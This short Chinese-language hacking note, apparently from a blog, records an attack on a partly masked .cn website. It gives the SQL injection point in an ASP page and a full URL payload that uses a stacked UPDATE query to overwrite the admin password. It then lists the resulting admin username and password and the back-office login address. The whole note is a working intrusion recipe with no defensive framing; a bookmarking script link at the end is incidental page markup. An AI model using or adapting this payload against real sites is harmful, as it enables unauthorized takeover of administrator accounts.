注入点:http://www.***.cn/webmedia/common/function/xtree.asp?id=1
直接updata密码:http://www.***.cn/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='bd69cacb3e83062b'%20where%20UserName='admin'
账号:admin密码:sshacker
后台地址:http://www.***.cn/webmedia/admin/login.asp
![[POCO网摘]](javascript:d=document;t=d.selection?(d.selection.type!='None'?d.selection.createRange().text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,status=no,resizable=yes'));keyit.focus();){kind=link}